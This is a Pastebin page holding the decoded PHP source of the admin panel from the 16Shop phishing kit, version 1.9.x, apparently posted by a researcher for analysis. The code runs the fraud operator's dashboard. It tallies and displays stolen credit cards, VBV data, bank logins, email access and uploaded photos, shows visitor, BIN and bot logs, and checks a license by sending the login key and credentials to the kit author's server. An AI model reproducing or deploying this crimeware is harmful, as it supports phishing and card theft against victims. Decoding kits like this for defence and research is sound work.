API tools faq
paste
Advertisement
Guest User

16Shop v. 1.9.x decoded admin/index.php

a guest
Nov 30th, 2018
135
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 23.35 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. // @dave_daves decoding
  3. // 16Shop 1.9.x
  4. // see: https://twitter.com/dave_daves/status/1068456168954175489
  5.  
  6. // admin/index.php
  7.  
  8. /*
  9.  
  10. d888 .d8888b. .d8888b. 888 888 .d88888b. 8888888b.
  11. d8888 d88P Y88b d88P Y88b 888 888 d88P" "Y88b 888 Y88b
  12. 888 888 Y88b. 888 888 888 888 888 888
  13. 888 888d888b. "Y888b. 8888888888 888 888 888 d88P
  14. 888 888P "Y88b "Y88b. 888 888 888 888 8888888P"
  15. 888 888 888 "888 888 888 888 888 888
  16. 888 Y88b d88P Y88b d88P 888 888 Y88b. .d88P 888
  17. 8888888 "Y8888P" "Y8888P" 888 888 "Y88888P" 888
  18.  
  19. */
  20. session_start();
  21. error_reporting(0);
  22. header("Content-Type: text/html; charset=UTF-8");
  23. $email = $_POST['email'];
  24. $password = $_POST['password'];
  25. $key = $_POST['key'];
  26. $page = $_GET['p'];
  27. $domain = preg_replace('/www\./i', '', $_SERVER['SERVER_NAME']);
  28. ?>
  29. <!DOCTYPE html>
  30. <html lang="en">
  31. <head>
  32. <title>16Shop - Admin Panel</title>
  33. <meta charset="UTF-8">
  34. <meta name="viewport" content="width=device-width, initial-scale=1">
  35. <!--===============================================================================================-->
  36. <link rel="icon" type="image/png" href="images/icons/favicon.ico"/>
  37. <!--===============================================================================================-->
  38. <link rel="stylesheet" type="text/css" href="vendor/bootstrap/css/bootstrap.min.css">
  39. <!--===============================================================================================-->
  40. <link rel="stylesheet" type="text/css" href="fonts/font-awesome-4.7.0/css/font-awesome.min.css">
  41. <!--===============================================================================================-->
  42. <link rel="stylesheet" type="text/css" href="fonts/Linearicons-Free-v1.0.0/icon-font.min.css">
  43. <!--===============================================================================================-->
  44. <link rel="stylesheet" type="text/css" href="vendor/animate/animate.css">
  45. <!--===============================================================================================-->
  46. <link rel="stylesheet" type="text/css" href="vendor/css-hamburgers/hamburgers.min.css">
  47. <!--===============================================================================================-->
  48. <link rel="stylesheet" type="text/css" href="vendor/animsition/css/animsition.min.css">
  49. <!--===============================================================================================-->
  50. <link rel="stylesheet" type="text/css" href="vendor/select2/select2.min.css">
  51. <!--===============================================================================================-->
  52. <link rel="stylesheet" type="text/css" href="vendor/daterangepicker/daterangepicker.css">
  53. <!--===============================================================================================-->
  54. <link rel="stylesheet" type="text/css" href="css/util.css">
  55. <link rel="stylesheet" type="text/css" href="css/main.css">
  56. <!--===============================================================================================-->
  57. </head>
  58. <body>
  59. <?php if($page == "") {
  60. if(isset($_SESSION['email_admin'])) {
  61. echo "<script type='text/javascript'>window.top.location='?p=home';</script>";
  62. exit();
  63. }
  64. if(isset($_POST['email'])) {
  65. $login = login($_POST['key'],$_POST['email'], $_POST['password']);
  66. if($login == "valid") {
  67. $_SESSION['email_admin'] = $_POST['email'];
  68. $_SESSION['password'] = $_POST['password'];
  69. }else if($login == "lock") {
  70. echo "<script type='text/javascript'>window.top.location='?p=lock';</script>";
  71. exit();
  72. }else{
  73. echo "<script type='text/javascript'>window.top.location='?p=gagal';</script>";
  74. exit();
  75. }
  76. echo "<script type='text/javascript'>window.top.location='?p=home';</script>";
  77.  
  78. }
  79.  
  80. echo ' <div class="limiter">
  81. <div class="container-login100">
  82. <div class="wrap-login100">
  83.  
  84. <div class="login100-form-title" style="background-image: url(bg.png);">
  85. <br><br><br><br>
  86.  
  87. </div>
  88.  
  89. <form action="index.php" method="POST" class="login100-form validate-form">
  90.  
  91. <div class="wrap-input100 validate-input m-b-26" data-validate="Public key is required">
  92. <span class="label-input100">Key</span>
  93. <input class="input100" type="text" name="key" placeholder="Enter public key">
  94. <span class="focus-input100"></span>
  95. </div>
  96. <div class="wrap-input100 validate-input m-b-26" data-validate="Email is required">
  97. <span class="label-input100">Email</span>
  98. <input class="input100" type="email" name="email" placeholder="Enter email">
  99. <span class="focus-input100"></span>
  100. </div>
  101.  
  102. <div class="wrap-input100 validate-input m-b-18" data-validate = "Password is required">
  103. <span class="label-input100">Password</span>
  104. <input class="input100" type="password" name="password" placeholder="Enter password">
  105. <span class="focus-input100"></span>
  106. </div>
  107.  
  108. <div class="flex-sb-m w-full p-b-30">
  109. <div class="contact100-form-checkbox">
  110. <input class="input-checkbox100" id="ckb1" type="checkbox" name="remember-me">
  111. <label class="label-checkbox100" for="ckb1">
  112. Remember me
  113. </label>
  114. </div>
  115.  
  116. <div>
  117. <a href="https://fb.me/riswanda.ns" class="txt1">
  118. Powered by Z1coder Team
  119. </a>
  120. </div>
  121. </div>
  122.  
  123. <div class="container-login100-form-btn">
  124. <button class="login100-form-btn">
  125. Login
  126. </button>
  127. </div>
  128. </form>
  129. </div>
  130. </div>
  131. </div>';
  132. }
  133.  
  134. if($page == "gagal") {
  135. echo '<div class="limiter">
  136. <div class="container-login100">
  137. <div class="wrap-login100">
  138.  
  139. <div class="login100-form-title" style="background-image: url(bg.png);">
  140. <br><br><br><br>
  141.  
  142. </div>
  143.  
  144. <form action="index.php" method="POST" class="login100-form validate-form">
  145. <font color="red">Email atau Password salah</font>
  146. <div class="wrap-input100 validate-input m-b-26" data-validate="Public key is required">
  147. <span class="label-input100">Key</span>
  148. <input class="input100" type="text" name="key" placeholder="Enter public key">
  149. <span class="focus-input100"></span>
  150. </div>
  151. <div class="wrap-input100 validate-input m-b-26" data-validate="Email is required">
  152. <span class="label-input100">Email</span>
  153. <input class="input100" type="email" name="email" placeholder="Enter email">
  154. <span class="focus-input100"></span>
  155. </div>
  156.  
  157. <div class="wrap-input100 validate-input m-b-18" data-validate = "Password is required">
  158. <span class="label-input100">Password</span>
  159. <input class="input100" type="password" name="password" placeholder="Enter password">
  160. <span class="focus-input100"></span>
  161. </div>
  162.  
  163.  
  164. <div class="flex-sb-m w-full p-b-30">
  165. <div class="contact100-form-checkbox">
  166. <input class="input-checkbox100" id="ckb1" type="checkbox" name="remember-me">
  167. <label class="label-checkbox100" for="ckb1">
  168. Remember me
  169. </label>
  170. </div>
  171.  
  172. <div>
  173. <a href="https://fb.me/riswanda.ns" class="txt1">
  174. Beli license?
  175. </a>
  176. </div>
  177. </div>
  178.  
  179. <div class="container-login100-form-btn">
  180. <button class="login100-form-btn">
  181. Login
  182. </button>
  183. </div>
  184. </form>
  185. </div>
  186. </div>
  187. </div>';
  188. }
  189.  
  190. if($page == "lock") {
  191. echo '<div class="limiter">
  192. <div class="container-login100">
  193. <div class="wrap-login100">
  194.  
  195. <div class="login100-form-title" style="background-image: url(bg.png);">
  196. <br><br><br><br>
  197.  
  198. </div>
  199.  
  200. <form action="index.php" method="POST" class="login100-form validate-form">
  201. <font color="red">Akun dikunci karena masalah keamanan</font>
  202. <div class="wrap-input100 validate-input m-b-26" data-validate="Email is required">
  203. <span class="label-input100">Email</span>
  204. <input class="input100" type="email" name="email" placeholder="Enter email">
  205. <span class="focus-input100"></span>
  206. </div>
  207.  
  208. <div class="wrap-input100 validate-input m-b-18" data-validate = "Password is required">
  209. <span class="label-input100">Password</span>
  210. <input class="input100" type="password" name="password" placeholder="Enter password">
  211. <span class="focus-input100"></span>
  212. </div>
  213.  
  214.  
  215. <div class="flex-sb-m w-full p-b-30">
  216. <div class="contact100-form-checkbox">
  217. <input class="input-checkbox100" id="ckb1" type="checkbox" name="remember-me">
  218. <label class="label-checkbox100" for="ckb1">
  219. Remember me
  220. </label>
  221. </div>
  222.  
  223. <div>
  224. <a href="https://fb.me/riswanda.ns" class="txt1">
  225. Beli license?
  226. </a>
  227. </div>
  228. </div>
  229.  
  230. <div class="container-login100-form-btn">
  231. <button class="login100-form-btn">
  232. Login
  233. </button>
  234. </div>
  235. </form>
  236. </div>
  237. </div>
  238. </div>';
  239. }
  240.  
  241.  
  242.  
  243. if($page == "history") {
  244. if(!isset($_SESSION['email_admin'])) {
  245. die("<script type='text/javascript'>window.top.location='index.php';</script>");
  246. }
  247. $click = "../result/log_visitor.txt";
  248. $file = fopen($click, "r");
  249. $log_visitor = fread($file, filesize($click));
  250. $log_visitor = "\n".$log_visitor;
  251. fclose($file);
  252. $click = "../result/total_bot.txt";
  253. $file = fopen($click, "r");
  254. $log_bot = fread($file, filesize($click));
  255. $log_bot = "\n".$log_bot;
  256. fclose($file);
  257.  
  258. $click = "../result/total_bin.txt";
  259. $file = fopen($click, "r");
  260. $log_bin = fread($file, filesize($click));
  261. $log_bin = "\n".$log_bin;
  262. fclose($file);
  263. echo '<div class="limiter">
  264. <div class="container-login100">
  265. <div class="wrap-login100">
  266. <div style="margin-top:-2px;background:#000;text-align:center;">
  267. <a style="background-color:#fff;color:#000;border-bottom-left-radius:2px;border-bottom-right-radius:2px;padding-right:20px;padding-left:20px;" href="?p=home">Statistic</a>
  268. <a style="background-color:#fff;color:#000;border-bottom-left-radius:2px;border-bottom-right-radius:2px;padding-right:20px;padding-left:20px;" href="?p=logout">Logout</a>
  269. </div>
  270. <div class="login100-form-title" style="background-image: url(bg.png);">
  271. <br><br><br><br>
  272.  
  273. </div>
  274.  
  275. <br><span style="margin-left:20px;"><b>Log Visitor</b></span><br>
  276. <textarea style="margin-left:20px;margin-top:5px;border-color:#000;border-style: inset;border-width:2px;" rows="15" cols="70%" disabled>
  277. '.$log_visitor.'
  278. </textarea>
  279. <br><br><span style="margin-left:20px;"><b>BIN List</b></span><br>
  280. <textarea style="margin-left:20px;margin-top:5px;border-color:#000;border-style: inset;border-width:2px;" rows="15" cols="70%" disabled>
  281. '.$log_bin.'
  282. </textarea>
  283. <br><br><span style="margin-left:20px;"><b>Bot Detected</b></span><br>
  284. <textarea style="margin-left:20px;margin-top:5px;border-color:#000;border-style: inset;border-width:2px;" rows="15" cols="70%" disabled>
  285. '.$log_bot.'
  286. </textarea>
  287. <br><br>
  288. <br>
  289. </div>
  290. </div>
  291. </div>';
  292. }
  293.  
  294. if($page == "home") {
  295. if(!isset($_SESSION['email_admin'])) {
  296. die("<script type='text/javascript'>window.top.location='index.php';</script>");
  297. }
  298. $click = "../result/total_click.txt";
  299. $file = fopen($click, "r");
  300. $total_click = fread($file, filesize($click));
  301. $total_click = substr_count($total_click, "\n");
  302. fclose($file);
  303. if($total_click == 0) {
  304. $total_click = "$total_click";
  305. }else{
  306. $total_click = "$total_click";
  307. }
  308.  
  309. $click = "../result/total_login.txt";
  310. $file = fopen($click, "r");
  311. $total_login = fread($file, filesize($click));
  312. $total_login = substr_count($total_login, "\n");
  313. fclose($file);
  314. if($total_login == 0) {
  315. $total_login = "$total_login";
  316. }else{
  317. $total_login = "$total_login";
  318. }
  319.  
  320. $click = "../result/total_cc.txt";
  321. $file = fopen($click, "r");
  322. $total_cc = fread($file, filesize($click));
  323. $total_cc = substr_count($total_cc, "\n");
  324. fclose($file);
  325. if($total_cc == 0) {
  326. $total_cc = "$total_cc";
  327. }else{
  328. $total_cc = "$total_cc";
  329. }
  330.  
  331. $click = "../result/total_vbv.txt";
  332. $file = fopen($click, "r");
  333. $total_vbv = fread($file, filesize($click));
  334. $total_vbv = substr_count($total_vbv, "\n");
  335. fclose($file);
  336. if($total_vbv == 0) {
  337. $total_vbv = "$total_vbv";
  338. }else{
  339. $total_vbv = "$total_vbv";
  340. }
  341.  
  342. $click = "../result/total_bank.txt";
  343. $file = fopen($click, "r");
  344. $total_bank = fread($file, filesize($click));
  345. $total_bank = substr_count($total_bank, "\n");
  346. fclose($file);
  347. if($total_bank == 0) {
  348. $total_bank = "$total_bank";
  349. }else{
  350. $total_bank = "$total_bank";
  351. }
  352.  
  353. $click = "../result/total_upload.txt";
  354. $file = fopen($click, "r");
  355. $total_photo = fread($file, filesize($click));
  356. $total_photo = substr_count($total_photo, "\n");
  357. fclose($file);
  358. if($total_photo == 0) {
  359. $total_photo = "$total_photo";
  360. }else{
  361. $total_photo = "$total_photo";
  362. }
  363.  
  364. $click = "../result/total_email.txt";
  365. $file = fopen($click, "r");
  366. $total_email = fread($file, filesize($click));
  367. $total_email = substr_count($total_email, "\n");
  368. fclose($file);
  369. if($total_email == 0) {
  370. $total_email = "$total_email";
  371. }else{
  372. $total_email = "$total_email";
  373. }
  374.  
  375. $click = "../result/total_bot.txt";
  376. $file = fopen($click, "r");
  377. $total_botnya = fread($file, filesize($click));
  378. $total_botnya = substr_count($total_botnya, "\n");
  379. fclose($file);
  380. if($total_botnya == 0) {
  381. $total_botnya = "$total_botnya";
  382. }else{
  383. $total_botnya = "$total_botnya";
  384. }
  385.  
  386. $click = "../result/log_visitor.txt";
  387. $file = fopen($click, "r");
  388. $log_visitor = fread($file, filesize($click));
  389. fclose($file);
  390.  
  391. $click = "../result/total_bot.txt";
  392. $file = fopen($click, "r");
  393. $log_bot = fread($file, filesize($click));
  394. fclose($file);
  395.  
  396. $click = "../result/total_bin.txt";
  397. $file = fopen($click, "r");
  398. $log_bin = fread($file, filesize($click));
  399. fclose($file);
  400. echo '<div class="limiter">
  401. <div class="container-login100">
  402. <div class="wrap-login100">
  403. <div style="margin-top:-2px;background:#000;text-align:center;">
  404. <a style="background-color:#fff;color:#000;border-bottom-left-radius:2px;border-bottom-right-radius:2px;padding-right:20px;padding-left:20px;" href="?p=home">Statistic</a>
  405. <a style="background-color:#fff;color:#000;border-bottom-left-radius:2px;border-bottom-right-radius:2px;padding-right:20px;padding-left:20px;" href="?p=logout">Logout</a>
  406. </div>
  407. <div class="login100-form-title" style="background-image: url(bg.png);">
  408. <br><br><br><br>
  409.  
  410. </div>
  411.  
  412. <div class="login100-form">
  413. <div class="wrap-input100 m-b-26">
  414. <span class="label-input100">Click</span>
  415. <input class="input100" type="text" value="'.$total_click.'" disabled>
  416. <span class="focus-input100"></span>
  417. </div>
  418. <div class="wrap-input100 m-b-26">
  419. <span class="label-input100">Login</span>
  420. <input class="input100" type="text" value="'.$total_login.'" disabled>
  421. <span class="focus-input100"></span>
  422. </div>
  423. <div class="wrap-input100 m-b-26">
  424. <span class="label-input100">Email Access</span>
  425. <input class="input100" type="text" value="'.$total_email.'" disabled>
  426. <span class="focus-input100"></span>
  427. </div>
  428. <div class="wrap-input100 m-b-26">
  429. <span class="label-input100">Credit Card</span>
  430. <input class="input100" type="text" value="'.$total_cc.'" disabled>
  431. <span class="focus-input100"></span>
  432. </div>
  433. <div class="wrap-input100 m-b-26">
  434. <span class="label-input100">VBV</span>
  435. <input class="input100" type="text" value="'.$total_vbv.'" disabled>
  436. <span class="focus-input100"></span>
  437. </div>
  438. <div class="wrap-input100 m-b-26">
  439. <span class="label-input100">Bank Login</span>
  440. <input class="input100" type="text" value="'.$total_bank.'" disabled>
  441. <span class="focus-input100"></span>
  442. </div>
  443. <div class="wrap-input100 m-b-26">
  444. <span class="label-input100">Upload Photo</span>
  445. <input class="input100" type="text" value="'.$total_photo.'" disabled>
  446. <span class="focus-input100"></span>
  447. </div>
  448. <div class="wrap-input100 validate-input m-b-18">
  449. <span class="label-input100">Bot Detected</span>
  450. <input class="input100" type="text" value="'.$total_botnya.'" disabled>
  451. <span class="focus-input100"></span>
  452. </div>
  453.  
  454.  
  455. <div class="container-login100-form-btn">
  456. <a style="text-decoration:none;color:#fff;" href="index.php?p=resetdata">
  457. <span style="background:#000;" class="login100-form-btn">
  458. Reset Data
  459. </span></a>
  460. &nbsp;&nbsp;<a style="text-decoration:none;color:#fff;" href="index.php?p=history">
  461. <span style="background:#000;" class="login100-form-btn">
  462. Log History
  463. </span></a>
  464.  
  465.  
  466. </div>
  467. </div>
  468. </div>
  469. </div>
  470. </div>';
  471. }
  472.  
  473. if($page == "logout") {
  474. session_destroy();
  475. echo "<script type='text/javascript'>window.top.location='?';</script>";
  476. }
  477.  
  478. if($page == "resetdata") {
  479. if(!isset($_SESSION['email_admin'])) {
  480. die("<script type='text/javascript'>window.top.location='index.php';</script>");
  481. }
  482. unlink("../result/total_login.txt");
  483. unlink("../result/total_email.txt");
  484. unlink("../result/total_cc.txt");
  485. unlink("../result/total_vbv.txt");
  486. unlink("../result/total_bot.txt");
  487. unlink("../result/total_bin.txt");
  488. unlink("../result/total_upload.txt");
  489. unlink("../result/total_click.txt");
  490. unlink("../result/total_bank.txt");
  491. unlink("../result/log_visitor.txt");
  492. echo "<script type='text/javascript'>window.top.location='?p=home';</script>";
  493. }
  494.  
  495. function login($key,$username,$password) {
  496. $get = curl_init();
  497. $agent = $_SERVER['HTTP_USER_AGENT'];
  498. $ipnya = user_ip();
  499. curl_setopt($get, CURLOPT_URL,"http://16shop.online/api/login_new.php");
  500. curl_setopt($get, CURLOPT_POST, 1);
  501. curl_setopt($get, CURLOPT_POSTFIELDS, "username=$username&password=$password&key=$key&ua=$agent&ip_user=$ipnya");
  502. curl_setopt($get, CURLOPT_RETURNTRANSFER, true);
  503. $server_output = curl_exec ($get);
  504. curl_close($get);
  505. return $server_output;
  506. }
  507.  
  508. function user_ip()
  509. {
  510. $client = @$_SERVER['HTTP_CLIENT_IP'];
  511. $forward = @$_SERVER['HTTP_X_FORWARDED_FOR'];
  512. $remote = $_SERVER['REMOTE_ADDR'];
  513.  
  514. if(filter_var($client, FILTER_VALIDATE_IP))
  515. {
  516. $ip = $client;
  517. }
  518. elseif(filter_var($forward, FILTER_VALIDATE_IP))
  519. {
  520. $ip = $forward;
  521. }
  522. else
  523. {
  524. $ip = $remote;
  525. }
  526.  
  527. return $ip;
  528. }
  529. ?>
  530. <!--===============================================================================================-->
  531. <script src="vendor/jquery/jquery-3.2.1.min.js"></script>
  532. <!--===============================================================================================-->
  533. <script src="vendor/animsition/js/animsition.min.js"></script>
  534. <!--===============================================================================================-->
  535. <script src="vendor/bootstrap/js/popper.js"></script>
  536. <script src="vendor/bootstrap/js/bootstrap.min.js"></script>
  537. <!--===============================================================================================-->
  538. <script src="vendor/select2/select2.min.js"></script>
  539. <!--===============================================================================================-->
  540. <script src="vendor/daterangepicker/moment.min.js"></script>
  541. <script src="vendor/daterangepicker/daterangepicker.js"></script>
  542. <!--===============================================================================================-->
  543. <script src="vendor/countdowntime/countdowntime.js"></script>
  544. <!--===============================================================================================-->
  545. <script src="js/main.js"></script>
  546.  
  547. </body>
  548. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!